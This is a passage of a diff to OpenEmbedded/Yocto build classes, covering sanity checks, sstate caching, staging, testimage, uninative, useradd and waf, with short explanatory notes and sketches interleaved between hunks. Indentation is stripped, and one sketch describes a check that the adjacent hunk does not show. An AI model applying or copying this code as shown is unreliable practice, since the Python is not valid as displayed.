suid_check_bins = "chown chmod mknod".split()
@@ -784,6 +815,11 @@ def check_sanity_everybuild(status, d):
if "." in paths or "./" in paths or "" in paths:
status.addresult("PATH contains '.', './' or '' (empty element), which will break the build, please remove this.\nParsed PATH is " + str(paths) + "\n")
+    # Check if bitbake is present in the PATH environment variable
+ bb_check = bb.utils.which(d.getVar('PATH'), 'bitbake')
+ if not bb_check:
+ bb.warn("bitbake binary is not found in PATH, did you source the script?")
+
# Check whether 'inherit' directive is found (used for a class to inherit)
# in conf file it's supposed to be uppercase INHERIT
inherit = d.getVar('inherit')
@@ -857,13 +893,18 @@ def check_sanity_everybuild(status, d):
except:
pass
- oeroot = d.getVar('COREBASE')
- if oeroot.find('+') != -1:
- status.addresult("Error, you have an invalid character (+) in your COREBASE directory path. Please move the installation to a directory which doesn't include any + characters.")
- if oeroot.find('@') != -1:
- status.addresult("Error, you have an invalid character (@) in your COREBASE directory path. Please move the installation to a directory which doesn't include any @ characters.")
- if oeroot.find(' ') != -1:
- status.addresult("Error, you have a space in your COREBASE directory path. Please move the installation to a directory which doesn't include a space since autotools doesn't support this.")
+ for checkdir in ['COREBASE', 'TMPDIR']:
+ val = d.getVar(checkdir)
+ if val.find('..') != -1:
+ status.addresult("Error, you have '..' in your %s directory path. Please ensure the variable contains an absolute path as this can break some recipe builds in obtuse ways." % checkdir)
+ if val.find('+') != -1:
+ status.addresult("Error, you have an invalid character (+) in your %s directory path. Please move the installation to a directory which doesn't include any + characters." % checkdir)
+ if val.find('@') != -1:
+ status.addresult("Error, you have an invalid character (@) in your %s directory path. Please move the installation to a directory which doesn't include any @ characters." % checkdir)
+ if val.find(' ') != -1:
+ status.addresult("Error, you have a space in your %s directory path. Please move the installation to a directory which doesn't include a space since autotools doesn't support this." % checkdir)
+ if val.find('%') != -1:
+ status.addresult("Error, you have an invalid character (%) in your %s directory path which causes problems with python string formatting. Please move the installation to a directory which doesn't include any % characters." % checkdir)
# Check the format of MIRRORS, PREMIRRORS and SSTATE_MIRRORS
import re
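
A condensed, standalone sketch of the rule the new overlap check enforces, assuming the same comma-separated layout of PSEUDO_IGNORE_PATHS; this fragment is illustrative, not the class code itself:

    python () {
        ignorepaths = (d.getVar('PSEUDO_IGNORE_PATHS', expand=True) or "").split(",")
        controlled = d.expand("${D},${PKGD},${PKGDEST}").split(",")
        for i in ignorepaths:
            for j in controlled:
                if i and j and j.startswith(i):
                    # overlapping paths would break pseudo ownership tracking
                    bb.warn("%s overlaps pseudo-controlled path %s" % (i, j))
    }
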
diff --git a/meta/classes/scons.bbclass b/meta/classes/scons.bbclass
index 6b171ca8df..4f3ae502ef 100644
--- a/meta/classes/scons.bbclass
+++ b/meta/classes/scons.bbclass
@@ -5,7 +5,6 @@ DEPENDS += "python3-scons-native"
EXTRA_OESCONS ?= ""
do_configure() {
- unset _PYTHON_SYSCONFIGDATA_NAME
if [ -n "${CONFIGURESTAMPFILE}" ]; then
if [ -e "${CONFIGURESTAMPFILE}" -a "`cat ${CONFIGURESTAMPFILE}`" != "${BB_TASKHASH}" -a "${CLEANBROKEN}" != "1" ]; then
${STAGING_BINDIR_NATIVE}/scons --clean PREFIX=${prefix} prefix=${prefix} ${EXTRA_OESCONS}
@@ -17,13 +16,11 @@ do_configure() {
}
scons_do_compile() {
- unset _PYTHON_SYSCONFIGDATA_NAME
${STAGING_BINDIR_NATIVE}/scons ${PARALLEL_MAKE} PREFIX=${prefix} prefix=${prefix} ${EXTRA_OESCONS} || \
die "scons build execution failed."
}
scons_do_install() {
- unset _PYTHON_SYSCONFIGDATA_NAME
${STAGING_BINDIR_NATIVE}/scons install_root=${D}${prefix} PREFIX=${prefix} prefix=${prefix} ${EXTRA_OESCONS} install || \
die "scons install execution failed."
}
diff --git a/meta/classes/sstate.bbclass b/meta/classes/sstate.bbclass
index 66a96a7603..1058778980 100644
--- a/meta/classes/sstate.bbclass
+++ b/meta/classes/sstate.bbclass
@@ -20,7 +20,7 @@ def generate_sstatefn(spec, hash, taskname, siginfo, d):
components = spec.split(":")
# Fields 0,5,6 are mandatory, 1 is most useful, 2,3,4 are just for information
# 7 is for the separators
- avail = (254 - len(hash + "_" + taskname + extension) - len(components[0]) - len(components[1]) - len(components[5]) - len(components[6]) - 7) // 3
+ avail = (limit - len(hash + "_" + taskname + extension) - len(components[0]) - len(components[1]) - len(components[5]) - len(components[6]) - 7) // 3
components[2] = components[2][:avail]
components[3] = components[3][:avail]
components[4] = components[4][:avail]
@@ -72,6 +72,7 @@ BB_HASHFILENAME = "False ${SSTATE_PKGSPEC} ${SSTATE_SWSPEC}"
SSTATE_ARCHS = " \
${BUILD_ARCH} \
+ ${BUILD_ARCH}_${ORIGNATIVELSBSTRING} \
${BUILD_ARCH}_${SDK_ARCH}_${SDK_OS} \
${BUILD_ARCH}_${TARGET_ARCH} \
${SDK_ARCH}_${SDK_OS} \
@@ -80,6 +81,7 @@ SSTATE_ARCHS = " \
${PACKAGE_ARCH} \
${PACKAGE_EXTRA_ARCHS} \
${MACHINE_ARCH}"
+SSTATE_ARCHS[vardepsexclude] = "ORIGNATIVELSBSTRING"
SSTATE_MANMACH ?= "${SSTATE_PKGARCH}"
@@ -315,6 +317,8 @@ def sstate_install(ss, d):
if os.path.exists(i):
with open(i, "r") as f:
manifests = f.readlines()
+                    # We append new entries; we don't remove older entries which may have the same
+                    # manifest name but different versions from stamp/workdir. See below.
if filedata not in manifests:
with open(i, "a+") as f:
f.write(filedata)
@@ -477,7 +481,7 @@ def sstate_clean_cachefiles(d):
ss = sstate_state_fromvars(ld, task)
sstate_clean_cachefile(ss, ld)
-def sstate_clean_manifest(manifest, d, prefix=None):
+def sstate_clean_manifest(manifest, d, canrace=False, prefix=None):
import oe.path
mfile = open(manifest)
@@ -495,7 +499,9 @@ def sstate_clean_manifest(manifest, d, prefix=None):
if entry.endswith("/"):
if os.path.islink(entry[:-1]):
os.remove(entry[:-1])
- elif os.path.exists(entry) and len(os.listdir(entry)) == 0:
+ elif os.path.exists(entry) and len(os.listdir(entry)) == 0 and not canrace:
+ # Removing directories whilst builds are in progress exposes a race. Only
+ # do it in contexts where it is safe to do so.
os.rmdir(entry[:-1])
else:
os.remove(entry)
@@ -533,7 +539,7 @@ def sstate_clean(ss, d):
for lock in ss['lockfiles']:
locks.append(bb.utils.lockfile(lock))
- sstate_clean_manifest(manifest, d)
+ sstate_clean_manifest(manifest, d, canrace=True)
for lock in locks:
bb.utils.unlockfile(lock)
@@ -634,10 +640,21 @@ python sstate_hardcode_path () {
def sstate_package(ss, d):
import oe.path
+ import time
tmpdir = d.getVar('TMPDIR')
+ fixtime = False
+ if ss['task'] == "package":
+ fixtime = True
+
+ def fixtimestamp(root, path):
+ f = os.path.join(root, path)
+ if os.lstat(f).st_mtime > sde:
+ os.utime(f, (sde, sde), follow_symlinks=False)
+
sstatebuild = d.expand("${WORKDIR}/sstate-build-%s/" % ss['task'])
+ sde = int(d.getVar("SOURCE_DATE_EPOCH") or time.time())
d.setVar("SSTATE_CURRTASK", ss['task'])
bb.utils.remove(sstatebuild, recurse=True)
bb.utils.mkdirhier(sstatebuild)
@@ -650,6 +667,8 @@ def sstate_package(ss, d):
# to sstate tasks but there aren't many of these so better just avoid them entirely.
for walkroot, dirs, files in os.walk(state[1]):
for file in files + dirs:
+ if fixtime:
+ fixtimestamp(walkroot, file)
srcpath = os.path.join(walkroot, file)
if not os.path.islink(srcpath):
continue
@@ -671,6 +690,11 @@ def sstate_package(ss, d):
bb.utils.mkdirhier(plain)
bb.utils.mkdirhier(pdir)
os.rename(plain, pdir)
+ if fixtime:
+ fixtimestamp(pdir, "")
+ for walkroot, dirs, files in os.walk(pdir):
+ for file in files + dirs:
+ fixtimestamp(walkroot, file)
d.setVar('SSTATE_BUILDDIR', sstatebuild)
d.setVar('SSTATE_INSTDIR', sstatebuild)
@@ -697,9 +721,16 @@ def sstate_package(ss, d):
os.utime(siginfo, None)
except PermissionError:
pass
+ except OSError as e:
+ # Handle read-only file systems gracefully
+ import errno
+ if e.errno != errno.EROFS:
+ raise e
return
+sstate_package[vardepsexclude] += "SSTATE_SIG_KEY"
+
def pstaging_fetch(sstatefetch, d):
import bb.fetch2
@@ -783,7 +814,7 @@ sstate_task_postfunc[dirs] = "${WORKDIR}"
sstate_create_package () {
# Exit early if it already exists
if [ -e ${SSTATE_PKG} ]; then
- [ ! -w ${SSTATE_PKG} ] || touch ${SSTATE_PKG}
+ touch ${SSTATE_PKG} 2>/dev/null || true
return
fi
@@ -810,14 +841,18 @@ sstate_create_package () {
fi
chmod 0664 $TFILE
# Skip if it was already created by some other process
- if [ ! -e ${SSTATE_PKG} ]; then
+ if [ -h ${SSTATE_PKG} ] && [ ! -e ${SSTATE_PKG} ]; then
+ # There is a symbolic link, but it links to nothing.
+ # Forcefully replace it with the new file.
+ ln -f $TFILE ${SSTATE_PKG} || true
+ elif [ ! -e ${SSTATE_PKG} ]; then
# Move into place using ln to attempt an atomic op.
# Abort if it already exists
- ln $TFILE ${SSTATE_PKG} && rm $TFILE
+ ln $TFILE ${SSTATE_PKG} || true
else
- rm $TFILE
+ touch ${SSTATE_PKG} 2>/dev/null || true
fi
- [ ! -w ${SSTATE_PKG} ] || touch ${SSTATE_PKG}
+ rm $TFILE
}
python sstate_sign_package () {
@@ -846,12 +881,12 @@ python sstate_report_unihash() {
#
sstate_unpack_package () {
tar -xvzf ${SSTATE_PKG}
- # update .siginfo atime on local/NFS mirror
- [ -O ${SSTATE_PKG}.siginfo ] && [ -w ${SSTATE_PKG}.siginfo ] && [ -h ${SSTATE_PKG}.siginfo ] && touch -a ${SSTATE_PKG}.siginfo
- # Use "! -w ||" to return true for read only files
- [ ! -w ${SSTATE_PKG} ] || touch --no-dereference ${SSTATE_PKG}
- [ ! -w ${SSTATE_PKG}.sig ] || [ ! -e ${SSTATE_PKG}.sig ] || touch --no-dereference ${SSTATE_PKG}.sig
- [ ! -w ${SSTATE_PKG}.siginfo ] || [ ! -e ${SSTATE_PKG}.siginfo ] || touch --no-dereference ${SSTATE_PKG}.siginfo
+ # update .siginfo atime on local/NFS mirror if it is a symbolic link
+ [ ! -h ${SSTATE_PKG}.siginfo ] || [ ! -e ${SSTATE_PKG}.siginfo ] || touch -a ${SSTATE_PKG}.siginfo 2>/dev/null || true
+ # update each symbolic link instead of any referenced file
+ touch --no-dereference ${SSTATE_PKG} 2>/dev/null || true
+ [ ! -e ${SSTATE_PKG}.sig ] || touch --no-dereference ${SSTATE_PKG}.sig 2>/dev/null || true
+ [ ! -e ${SSTATE_PKG}.siginfo ] || touch --no-dereference ${SSTATE_PKG}.siginfo 2>/dev/null || true
}
BB_HASHCHECK_FUNCTION = "sstate_checkhashes"
@@ -926,7 +961,7 @@ def sstate_checkhashes(sq_data, d, siginfo=False, currentcount=0, summary=True,
localdata2 = bb.data.createCopy(localdata)
srcuri = "file://" + sstatefile
- localdata.setVar('SRC_URI', srcuri)
+ localdata2.setVar('SRC_URI', srcuri)
bb.debug(2, "SState: Attempting to fetch %s" % srcuri)
try:
@@ -937,10 +972,11 @@ def sstate_checkhashes(sq_data, d, siginfo=False, currentcount=0, summary=True,
found.add(tid)
if tid in missed:
missed.remove(tid)
- except:
+ except bb.fetch2.FetchError as e:
missed.add(tid)
- bb.debug(2, "SState: Unsuccessful fetch test for %s" % srcuri)
- pass
+ bb.debug(2, "SState: Unsuccessful fetch test for %s (%s)" % (srcuri, e))
+ except Exception as e:
+ bb.error("SState: cannot test %s: %s" % (srcuri, e))
if len(tasklist) >= min_tasks:
bb.event.fire(bb.event.ProcessProgress(msg, len(tasklist) - thread_worker.tasks.qsize()), d)
@@ -1002,6 +1038,7 @@ def sstate_checkhashes(sq_data, d, siginfo=False, currentcount=0, summary=True,
bb.parse.siggen.checkhashes(sq_data, missed, found, d)
return found
+setscene_depvalid[vardepsexclude] = "SSTATE_EXCLUDEDEPS_SYSROOT"
BB_SETSCENE_DEPVALID = "setscene_depvalid"
@@ -1027,6 +1064,10 @@ def setscene_depvalid(task, taskdependees, notneeded, d, log=None):
if taskdependees[task][1] == "do_populate_lic":
return True
+ # We only need to trigger deploy_source_date_epoch through direct dependencies
+ if taskdependees[task][1] == "do_deploy_source_date_epoch":
+ return True
+
# stash_locale and gcc_stash_builddir are never needed as a dependency for built objects
if taskdependees[task][1] == "do_stash_locale" or taskdependees[task][1] == "do_gcc_stash_builddir":
return True
@@ -1133,6 +1174,11 @@ python sstate_eventhandler() {
os.utime(siginfo, None)
except PermissionError:
pass
+ except OSError as e:
+ # Handle read-only file systems gracefully
+ import errno
+ if e.errno != errno.EROFS:
+ raise e
}
@@ -1171,11 +1217,21 @@ python sstate_eventhandler2() {
i = d.expand("${SSTATE_MANIFESTS}/index-" + a)
if not os.path.exists(i):
continue
+ manseen = set()
+ ignore = []
with open(i, "r") as f:
lines = f.readlines()
- for l in lines:
+ for l in reversed(lines):
try:
(stamp, manifest, workdir) = l.split()
+ # The index may have multiple entries for the same manifest as the code above only appends
+ # new entries and there may be an entry with matching manifest but differing version in stamp/workdir.
+ # The last entry in the list is the valid one, any earlier entries with matching manifests
+ # should be ignored.
+ if manifest in manseen:
+ ignore.append(l)
+ continue
+ manseen.add(manifest)
if stamp not in stamps and stamp not in preservestamps and stamp in machineindex:
toremove.append(l)
if stamp not in seen:
@@ -1206,6 +1262,8 @@ python sstate_eventhandler2() {
with open(i, "w") as f:
for l in lines:
+ if l in ignore:
+ continue
f.write(l)
machineindex |= set(stamps)
with open(mi, "w") as f:
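
The manifest index de-duplication walks the file bottom-up so that the most recent entry for each manifest wins. A standalone sketch of that rule with hypothetical index entries:

    python () {
        lines = ["stamp-old manifest-a workdir-1\n",
                 "stamp-new manifest-a workdir-2\n"]
        manseen = set()
        keep = []
        for l in reversed(lines):
            stamp, manifest, workdir = l.split()
            if manifest in manseen:
                continue            # older duplicate, ignore it
            manseen.add(manifest)
            keep.append(l)
        keep.reverse()              # keep == ["stamp-new manifest-a workdir-2\n"]
    }
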
diff --git a/meta/classes/staging.bbclass b/meta/classes/staging.bbclass
index 5b04f88b2d..21523c8f75 100644
--- a/meta/classes/staging.bbclass
+++ b/meta/classes/staging.bbclass
@@ -27,11 +27,15 @@ SYSROOT_DIRS_BLACKLIST = " \
${mandir} \
${docdir} \
${infodir} \
+ ${datadir}/X11/locale \
${datadir}/applications \
+ ${datadir}/bash-completion \
${datadir}/fonts \
${datadir}/gtk-doc/html \
+ ${datadir}/installed-tests \
${datadir}/locale \
${datadir}/pixmaps \
+ ${datadir}/terminfo \
${libdir}/${BPN}/ptest \
"
@@ -263,6 +267,10 @@ python extend_recipe_sysroot() {
pn = d.getVar("PN")
stagingdir = d.getVar("STAGING_DIR")
sharedmanifests = d.getVar("COMPONENTS_DIR") + "/manifests"
+ # only needed by multilib cross-canadian since it redefines RECIPE_SYSROOT
+ manifestprefix = d.getVar("RECIPE_SYSROOT_MANIFEST_SUBDIR")
+ if manifestprefix:
+ sharedmanifests = sharedmanifests + "/" + manifestprefix
recipesysroot = d.getVar("RECIPE_SYSROOT")
recipesysrootnative = d.getVar("RECIPE_SYSROOT_NATIVE")
@@ -404,7 +412,7 @@ python extend_recipe_sysroot() {
if os.path.islink(f) and not os.path.exists(f):
bb.note("%s no longer exists, removing from sysroot" % f)
lnk = os.readlink(f.replace(".complete", ""))
- sstate_clean_manifest(depdir + "/" + lnk, d, workdir)
+ sstate_clean_manifest(depdir + "/" + lnk, d, canrace=True, prefix=workdir)
os.unlink(f)
os.unlink(f.replace(".complete", ""))
@@ -449,7 +457,7 @@ python extend_recipe_sysroot() {
fl = depdir + "/" + l
bb.note("Task %s no longer depends on %s, removing from sysroot" % (mytaskname, l))
lnk = os.readlink(fl)
- sstate_clean_manifest(depdir + "/" + lnk, d, workdir)
+ sstate_clean_manifest(depdir + "/" + lnk, d, canrace=True, prefix=workdir)
os.unlink(fl)
os.unlink(fl + ".complete")
@@ -470,7 +478,7 @@ python extend_recipe_sysroot() {
continue
else:
bb.note("%s exists in sysroot, but is stale (%s vs. %s), removing." % (c, lnk, c + "." + taskhash))
- sstate_clean_manifest(depdir + "/" + lnk, d, workdir)
+ sstate_clean_manifest(depdir + "/" + lnk, d, canrace=True, prefix=workdir)
os.unlink(depdir + "/" + c)
if os.path.lexists(depdir + "/" + c + ".complete"):
os.unlink(depdir + "/" + c + ".complete")
diff --git a/meta/classes/systemd.bbclass b/meta/classes/systemd.bbclass
index 9e8a82c9f1..a4bff732b9 100644
--- a/meta/classes/systemd.bbclass
+++ b/meta/classes/systemd.bbclass
@@ -174,7 +174,8 @@ python systemd_populate_packages() {
if path_found != '':
systemd_add_files_and_parse(pkg_systemd, path_found, service, keys)
else:
- bb.fatal("SYSTEMD_SERVICE_%s value %s does not exist" % (pkg_systemd, service))
+ bb.fatal("Didn't find service unit '{0}', specified in SYSTEMD_SERVICE_{1}. {2}".format(
+ service, pkg_systemd, "Also looked for service unit '{0}'.".format(base) if base is not None else ""))
def systemd_create_presets(pkg, action):
presetf = oe.path.join(d.getVar("PKGD"), d.getVar("systemd_unitdir"), "system-preset/98-%s.preset" % pkg)
diff --git a/meta/classes/testimage.bbclass b/meta/classes/testimage.bbclass
index c709384b91..7c8b2b30a1 100644
--- a/meta/classes/testimage.bbclass
+++ b/meta/classes/testimage.bbclass
@@ -99,30 +99,9 @@ TESTIMAGE_DUMP_DIR ?= "${LOG_DIR}/runtime-hostdump/"
TESTIMAGE_UPDATE_VARS ?= "DL_DIR WORKDIR DEPLOY_DIR"
testimage_dump_target () {
- top -bn1
- ps
- free
- df
- # The next command will export the default gateway IP
- export DEFAULT_GATEWAY=$(ip route | awk '/default/ { print $3}')
- ping -c3 $DEFAULT_GATEWAY
- dmesg
- netstat -an
- ip address
- # Next command will dump logs from /var/log/
- find /var/log/ -type f 2>/dev/null -exec echo "====================" \; -exec echo {} \; -exec echo "====================" \; -exec cat {} \; -exec echo "" \;
}
testimage_dump_host () {
- top -bn1
- iostat -x -z -N -d -p ALL 20 2
- ps -ef
- free
- df
- memstat
- dmesg
- ip -s link
- netstat -an
}
python do_testimage() {
@@ -193,6 +172,7 @@ def testimage_main(d):
import json
import signal
import logging
+ import shutil
from bb.utils import export_proxies
from oeqa.core.utils.misc import updateTestData
@@ -228,9 +208,10 @@ def testimage_main(d):
tdname = "%s.testdata.json" % image_name
try:
- td = json.load(open(tdname, "r"))
- except (FileNotFoundError) as err:
- bb.fatal('File %s Not Found. Have you built the image with INHERIT+="testimage" in the conf/local.conf?' % tdname)
+ with open(tdname, "r") as f:
+ td = json.load(f)
+ except FileNotFoundError as err:
+ bb.fatal('File %s not found (%s).\nHave you built the image with INHERIT += "testimage" in the conf/local.conf?' % (tdname, err))
# Some variables need to be updates (mostly paths) with the
# ones of the current environment because some tests require them.
@@ -397,10 +378,17 @@ def testimage_main(d):
get_testimage_result_id(configuration),
dump_streams=d.getVar('TESTREPORT_FULLLOGS'))
results.logSummary(pn)
+
+ # Copy additional logs to tmp/log/oeqa so it's easier to find them
+ targetdir = os.path.join(get_testimage_json_result_dir(d), d.getVar("PN"))
+ os.makedirs(targetdir, exist_ok=True)
+ os.symlink(bootlog, os.path.join(targetdir, os.path.basename(bootlog)))
+ os.symlink(d.getVar("BB_LOGFILE"), os.path.join(targetdir, os.path.basename(d.getVar("BB_LOGFILE") + "." + d.getVar('DATETIME'))))
+
if not results or not complete:
- bb.fatal('%s - FAILED - tests were interrupted during execution' % pn, forcelog=True)
+ bb.fatal('%s - FAILED - tests were interrupted during execution, check the logs in %s' % (pn, d.getVar("LOG_DIR")), forcelog=True)
if not results.wasSuccessful():
- bb.fatal('%s - FAILED - check the task log and the ssh log' % pn, forcelog=True)
+ bb.fatal('%s - FAILED - also check the logs in %s' % (pn, d.getVar("LOG_DIR")), forcelog=True)
def get_runtime_paths(d):
"""
diff --git a/meta/classes/toolchain-scripts.bbclass b/meta/classes/toolchain-scripts.bbclass
index db1d3215ef..21762b803b 100644
--- a/meta/classes/toolchain-scripts.bbclass
+++ b/meta/classes/toolchain-scripts.bbclass
@@ -29,7 +29,7 @@ toolchain_create_sdk_env_script () {
echo '# http://tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html#AEN80' >> $script
echo '# http://xahlee.info/UnixResource_dir/_/ldpath.html' >> $script
echo '# Only disable this check if you are absolutely know what you are doing!' >> $script
- echo 'if [ ! -z "$LD_LIBRARY_PATH" ]; then' >> $script
+ echo 'if [ ! -z "${LD_LIBRARY_PATH:-}" ]; then' >> $script
echo " echo \"Your environment is misconfigured, you probably need to 'unset LD_LIBRARY_PATH'\"" >> $script
echo " echo \"but please check why this was set in the first place and that it's safe to unset.\"" >> $script
echo ' echo "The SDK will not operate correctly in most cases when LD_LIBRARY_PATH is set."' >> $script
@@ -44,7 +44,7 @@ toolchain_create_sdk_env_script () {
for i in ${CANADIANEXTRAOS}; do
EXTRAPATH="$EXTRAPATH:$sdkpathnative$bindir/${TARGET_ARCH}${TARGET_VENDOR}-$i"
done
- echo "export PATH=$sdkpathnative$bindir:$sdkpathnative$sbindir:$sdkpathnative$base_bindir:$sdkpathnative$base_sbindir:$sdkpathnative$bindir/../${HOST_SYS}/bin:$sdkpathnative$bindir/${TARGET_SYS}"$EXTRAPATH':$PATH' >> $script
+ echo "export PATH=$sdkpathnative$bindir:$sdkpathnative$sbindir:$sdkpathnative$base_bindir:$sdkpathnative$base_sbindir:$sdkpathnative$bindir/../${HOST_SYS}/bin:$sdkpathnative$bindir/${TARGET_SYS}"$EXTRAPATH':"$PATH"' >> $script
echo 'export PKG_CONFIG_SYSROOT_DIR=$SDKTARGETSYSROOT' >> $script
echo 'export PKG_CONFIG_PATH=$SDKTARGETSYSROOT'"$libdir"'/pkgconfig:$SDKTARGETSYSROOT'"$prefix"'/share/pkgconfig' >> $script
echo 'export CONFIG_SITE=${SDKPATH}/site-config-'"${multimach_target_sys}" >> $script
diff --git a/meta/classes/uboot-extlinux-config.bbclass b/meta/classes/uboot-extlinux-config.bbclass
index f4bf94be04..be285daa01 100644
--- a/meta/classes/uboot-extlinux-config.bbclass
+++ b/meta/classes/uboot-extlinux-config.bbclass
@@ -153,5 +153,6 @@ python do_create_extlinux_config() {
}
UBOOT_EXTLINUX_VARS = "CONSOLE MENU_DESCRIPTION ROOT KERNEL_IMAGE FDTDIR FDT KERNEL_ARGS INITRD"
do_create_extlinux_config[vardeps] += "${@' '.join(['UBOOT_EXTLINUX_%s_%s' % (v, l) for v in d.getVar('UBOOT_EXTLINUX_VARS').split() for l in d.getVar('UBOOT_EXTLINUX_LABELS').split()])}"
+do_create_extlinux_config[vardepsexclude] += "OVERRIDES"
addtask create_extlinux_config before do_install do_deploy after do_compile
diff --git a/meta/classes/uninative.bbclass b/meta/classes/uninative.bbclass
index 1e19917a97..4d4f53ad4d 100644
--- a/meta/classes/uninative.bbclass
+++ b/meta/classes/uninative.bbclass
@@ -2,7 +2,7 @@ UNINATIVE_LOADER ?= "${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux/lib/
UNINATIVE_STAGING_DIR ?= "${STAGING_DIR}"
UNINATIVE_URL ?= "unset"
-UNINATIVE_TARBALL ?= "${BUILD_ARCH}-nativesdk-libc.tar.xz"
+UNINATIVE_TARBALL ?= "${BUILD_ARCH}-nativesdk-libc-${UNINATIVE_VERSION}.tar.xz"
# Example checksums
#UNINATIVE_CHECKSUM[aarch64] = "dead"
#UNINATIVE_CHECKSUM[i686] = "dead"
@@ -34,6 +34,8 @@ python uninative_event_fetchloader() {
with open(loaderchksum, "r") as f:
readchksum = f.read().strip()
if readchksum == chksum:
+ if "uninative" not in d.getVar("SSTATEPOSTUNPACKFUNCS"):
+ enable_uninative(d)
return
import subprocess
@@ -100,7 +102,7 @@ ${UNINATIVE_STAGING_DIR}-uninative/relocate_sdk.py \
${UNINATIVE_LOADER} \
${UNINATIVE_LOADER} \
${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux/${bindir_native}/patchelf-uninative \
- ${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux${base_libdir_native}/libc*.so" % chksum)
+ ${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux${base_libdir_native}/libc*.so*" % chksum)
subprocess.check_output(cmd, shell=True)
with open(loaderchksum, "w") as f:
@@ -167,5 +169,7 @@ python uninative_changeinterp () {
if not elf.isDynamic():
continue
+ os.chmod(f, s[stat.ST_MODE] | stat.S_IWUSR)
subprocess.check_output(("patchelf-uninative", "--set-interpreter", d.getVar("UNINATIVE_LOADER"), f), stderr=subprocess.STDOUT)
+ os.chmod(f, s[stat.ST_MODE])
}
diff --git a/meta/classes/useradd-staticids.bbclass b/meta/classes/useradd-staticids.bbclass
index 3a1b5f1320..908b24969f 100644
--- a/meta/classes/useradd-staticids.bbclass
+++ b/meta/classes/useradd-staticids.bbclass
@@ -41,7 +41,7 @@ def update_useradd_static_config(d):
def handle_missing_id(id, type, pkg, files, var, value):
# For backwards compatibility we accept "1" in addition to "error"
error_dynamic = d.getVar('USERADD_ERROR_DYNAMIC')
- msg = "%s - %s: %sname %s does not have a static ID defined." % (d.getVar('PN'), pkg, type, id)
+ msg = 'Recipe %s, package %s: %sname "%s" does not have a static ID defined.' % (d.getVar('PN'), pkg, type, id)
if files:
msg += " Add %s to one of these files: %s" % (id, files)
else:
diff --git a/meta/classes/useradd.bbclass b/meta/classes/useradd.bbclass
index e5f3ba24f9..0f0ed3446d 100644
--- a/meta/classes/useradd.bbclass
+++ b/meta/classes/useradd.bbclass
@@ -230,6 +230,10 @@ fakeroot python populate_packages_prepend () {
preinst += 'perform_useradd () {\n%s}\n' % d.getVar('perform_useradd')
preinst += 'perform_groupmems () {\n%s}\n' % d.getVar('perform_groupmems')
preinst += d.getVar('useradd_preinst')
+ # Expand out the *_PARAM variables to the package specific versions
+ for rep in ["GROUPADD_PARAM", "USERADD_PARAM", "GROUPMEMS_PARAM"]:
+ val = d.getVar(rep + "_" + pkg) or ""
+ preinst = preinst.replace("${" + rep + "}", val)
d.setVar('pkg_preinst_%s' % pkg, preinst)
# RDEPENDS setup
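
The loop above substitutes the per-package parameter variables into the generated preinst script; a hypothetical recipe fragment showing the variables it picks up (user and group names are illustrative):

    USERADD_PACKAGES = "${PN}"
    USERADD_PARAM_${PN} = "--system --shell /bin/false --home-dir /var/lib/example example"
    GROUPADD_PARAM_${PN} = "--system example"
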
diff --git a/meta/classes/utils.bbclass b/meta/classes/utils.bbclass
index cd3d05709e..99f68f7505 100644
--- a/meta/classes/utils.bbclass
+++ b/meta/classes/utils.bbclass
@@ -233,7 +233,7 @@ create_cmdline_wrapper () {
#!/bin/bash
realpath=\`readlink -fn \$0\`
realdir=\`dirname \$realpath\`
-exec -a \`dirname \$realpath\`/$cmdname \`dirname \$realpath\`/$cmdname.real $cmdoptions "\$@"
+exec -a \$realdir/$cmdname \$realdir/$cmdname.real $cmdoptions "\$@"
END
chmod +x $cmd
}
diff --git a/meta/classes/waf.bbclass b/meta/classes/waf.bbclass
index 900244004e..8fa5063645 100644
--- a/meta/classes/waf.bbclass
+++ b/meta/classes/waf.bbclass
@@ -1,10 +1,19 @@
# avoids build breaks when using no-static-libs.inc
DISABLE_STATIC = ""
+# What Python interpreter to use. Defaults to Python 3 but can be
+# overridden if required.
+WAF_PYTHON ?= "python3"
+
B = "${WORKDIR}/build"
EXTRA_OECONF_append = " ${PACKAGECONFIG_CONFARGS}"
+EXTRA_OEWAF_BUILD ??= ""
+# In most cases, you want to pass the same arguments to `waf build` and `waf
+# install`, but you can override it if necessary
+EXTRA_OEWAF_INSTALL ??= "${EXTRA_OEWAF_BUILD}"
+
def waflock_hash(d):
# Calculates the hash used for the waf lock file. This should include
# all of the user controllable inputs passed to waf configure. Note
@@ -35,9 +44,10 @@ python waf_preconfigure() {
import subprocess
from distutils.version import StrictVersion
subsrcdir = d.getVar('S')
+ python = d.getVar('WAF_PYTHON')
wafbin = os.path.join(subsrcdir, 'waf')
try:
- result = subprocess.check_output([wafbin, '--version'], cwd=subsrcdir, stderr=subprocess.STDOUT)
+ result = subprocess.check_output([python, wafbin, '--version'], cwd=subsrcdir, stderr=subprocess.STDOUT)
version = result.decode('utf-8').split()[1]
if StrictVersion(version) >= StrictVersion("1.8.7"):
d.setVar("WAF_EXTRA_CONF", "--bindir=${bindir} --libdir=${libdir}")
@@ -50,16 +60,16 @@ python waf_preconfigure() {
do_configure[prefuncs] += "waf_preconfigure"
waf_do_configure() {
- (cd ${S} && ./waf configure -o ${B} --prefix=${prefix} ${WAF_EXTRA_CONF} ${EXTRA_OECONF})
+ (cd ${S} && ${WAF_PYTHON} ./waf configure -o ${B} --prefix=${prefix} ${WAF_EXTRA_CONF} ${EXTRA_OECONF})
}
do_compile[progress] = "outof:^\[\s*(\d+)/\s*(\d+)\]\s+"
waf_do_compile() {
- (cd ${S} && ./waf build ${@oe.utils.parallel_make_argument(d, '-j%d', limit=64)})
+ (cd ${S} && ${WAF_PYTHON} ./waf build ${@oe.utils.parallel_make_argument(d, '-j%d', limit=64)} ${EXTRA_OEWAF_BUILD})
}
waf_do_install() {
- (cd ${S} && ./waf install --destdir=${D})
+ (cd ${S} && ${WAF_PYTHON} ./waf install --destdir=${D} ${EXTRA_OEWAF_INSTALL})
}
EXPORT_FUNCTIONS do_configure do_compile do_install
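
With the interpreter and extra arguments now configurable, a recipe can tune the waf invocation without redefining the tasks. A hypothetical fragment (the -v flag simply makes waf verbose):

    EXTRA_OEWAF_BUILD = "-v"
    # EXTRA_OEWAF_INSTALL defaults to the same value, so `waf install` is also
    # verbose unless the recipe overrides it separately.
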
diff --git a/meta/conf/abi_version.conf b/meta/conf/abi_version.conf
